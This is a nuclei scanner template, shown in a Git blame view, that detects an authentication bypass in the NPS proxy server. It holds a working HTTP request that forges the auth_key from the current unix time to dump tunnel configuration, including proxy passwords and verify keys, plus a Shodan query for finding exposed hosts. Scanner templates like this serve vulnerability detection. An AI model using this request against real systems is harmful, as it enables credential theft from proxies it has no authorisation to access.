nuclei-templates/http/vulnerabilities/nps/nps-auth-bypass.yaml

43 lines
978 B
YAML
Raw Normal View History

2022-12-06 08:52:23 +00:00
id: nps-auth-bypass
info:
2022-12-09 09:03:49 +00:00
name: NPS - Authentication Bypass
2022-12-06 08:52:23 +00:00
author: SleepingBag945
severity: high
2022-12-07 05:19:50 +00:00
description: |
This will reveal all parameters configured on the NPS, including the account username and password of the proxy.
2022-12-06 08:52:23 +00:00
reference:
- https://mari0er.club/post/nps.html/
2022-12-07 05:19:50 +00:00
metadata:
verified: true
2022-12-09 09:03:49 +00:00
shodan-query: html:"window.nps"
2022-12-06 08:52:23 +00:00
tags: nps,auth-bypass
http:
2022-12-06 08:52:23 +00:00
- raw:
- |
POST /index/gettunnel HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
auth_key={{md5(unix_time())}}&timestamp={{unix_time()}}&offset=0&limit=10&type=socks5&client_id=&search=
matchers-condition: and
matchers:
- type: word
2022-12-07 05:19:50 +00:00
part: body
2022-12-06 08:52:23 +00:00
words:
2022-12-09 09:03:49 +00:00
- '"VerifyKey":'
- 'Password":'
- 'Id":'
2022-12-06 08:52:23 +00:00
condition: and
2022-12-07 05:19:50 +00:00
2022-12-07 05:25:13 +00:00
- type: word
part: header
words:
- "application/json"
2022-12-06 08:52:23 +00:00
- type: status
status:
- 200